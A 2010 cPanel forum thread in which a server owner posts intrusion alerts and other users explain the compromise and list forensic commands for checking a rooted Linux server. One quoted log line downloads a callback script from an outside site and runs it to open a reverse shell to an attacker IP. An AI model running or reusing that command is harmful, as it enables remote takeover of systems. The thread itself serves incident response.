The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Exploit on my server

Discussion in 'Security' started by Parcye, May 4, 2010.

  1. Parcye

    Parcye Well-Known Member

    Joined:
    May 19, 2004
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Eindhoven
    Hi

    I have just opend my mailbox and see loads of warning mails.

    For example:
    Code:
    Time:    Tue May  4 21:38:53 2010 +0200
    PID:     30804
    Account: nobody
    Uptime:  115 seconds
    
    
    Executable:
    
    /bin/bash
    
    
    Command Line (often faked in exploits):
    
    sh -c cd /tmp/;wget davemorar.angelfire.com/callback;perl callback 188.24.6.161 80
    
    
    Network connections by the process (if any):
    Code:
    Time:    Tue May  4 21:38:53 2010 +0200
    PID:     30813
    Account: nobody
    Uptime:  114 seconds
    
    
    Executable:
    
    /bin/bash
    
    
    Command Line (often faked in exploits):
    
    /bin/sh
    
    
    Network connections by the process (if any):
    Code:
    Time:   Tue May  4 21:37:24 2010 +0200
    File:   /tmp/expls/linux-sendpage
    Reason: Binary executable
    Owner:  nobody:nobody
    Action: No action taken
    I feel like pannic!
     

    Attached Files:

    #1 Parcye, May 4, 2010
    Last edited: May 4, 2010
  2. thobarn

    thobarn Well-Known Member

    Joined:
    Apr 25, 2008
    Messages:
    153
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    sanctum sanctorum
    This
    gave a reverse shell to 188.24.6.161 using some "utility" left online by davemorar.angelfire.com.

    The file you attached is a pretty recent exploit that can be used to elevate privileges to root (if one already has access).

    So at some point someone had access to the machine which was later elevated to root. It is safe to assume that your machine is under the control of someone from Romania by now.

    The best thing to do would be to take it off the net ASAP and rebuild from scratch if that is doable. If you cannot take it offline for any reason I would recommend getting someone who knows what s/he is doing to clean it. Good luck.
     
    #2 thobarn, May 4, 2010
    Last edited: May 4, 2010
  3. Parcye

    Parcye Well-Known Member

    Joined:
    May 19, 2004
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Eindhoven
    Well as soon as I got these mails I blocked those IP's and got some action going. What symptoms would a taken over server show? What are the signs I should see?
     
  4. thobarn

    thobarn Well-Known Member

    Joined:
    Apr 25, 2008
    Messages:
    153
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    sanctum sanctorum
    If s/he is good there will be no symptoms or signs. I am not qualified to give you an answer so do take what I say with a pinch of salt and seek professional help.

    What you do next depends on what you have on your server. The biggest problem is that any tools you will be using may have been replaced so you cannot trust any output you get. That said:

    Verify package integrity paying particular attention to /bin /sbin /usr
    Code:
    rpm -Va
    Also take a chronological order of installs to see if the there is an unexpected update/install
    Code:
    rpm -qa
    Check logs /var/log, bash_history...or whatever you have.
    Find recently modified files
    Code:
    ls -lat /
    find / -mtime -3d -ls
    Get a list of processes running to see if there is anything that should not be there, using unlinked files etc
    Code:
    ps aux
    lsof -i
    lsof +L1
    Get a list of network connections
    Code:
    netstat -nap
    lsof | grep ESTABLISHED
    lsof | grep LISTEN
    Check hosts file and DNS settings
    Code:
    cat /etc/hosts
    cat /etc/resolve.conf 
    Check latest events
    Code:
    last
    lastlog
    Check users
    Code:
    cat /etc/passwd 
    Check auto starts
    Code:
    chkconfig --list
    Check scheduled jobs
    Code:
    crontab -u root -l
    cat /etc/crontab
    ls /etc/cron.*
    Consider running tripwire, chkrootkit, aide

    Depending on what you find, then you can drill more.

    Preserve any information you find and report the crime locally, and to the intruder's ISP once you complete your investigation, even if you think it won't be followed up.

    HTH. Good luck.

    edited to add: If you did not already, remove /tmp/callback (and /tmp/expls/) after making a note of date and time. The timestamp of those will give you a good reference point to start
     
    #4 thobarn, May 5, 2010
    Last edited: May 5, 2010
  5. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    Well you are are actually telling Parcye all the right things here ...

    I fully agree this user has likely been rooted and it is reasonable to assume there are other exploits and backdoors at this point.

    This is a very complex issue and though there would be a lot of signs for a professional like myself observing the server, chances are you would not be aware of anything happening at all whatsoever other than perhaps a bit higher loads with most activity going on behind the scenes and wouldn't be overly apparent to most average server users.

    Once access is gained to a server, a hacker has two primary objectives and that is to cover the trail of anything that might expose them and create secondary backup methods of access to the server. These things usually come first before anything else they might choose to do.

    The entire server needs to be analyzed, checksums compared on system binaries, exploits removed, security hardened and very likely rebuild the underlying system if there is any remaining doubts as to its status regarding the server's security.
     
Loading...

Share This Page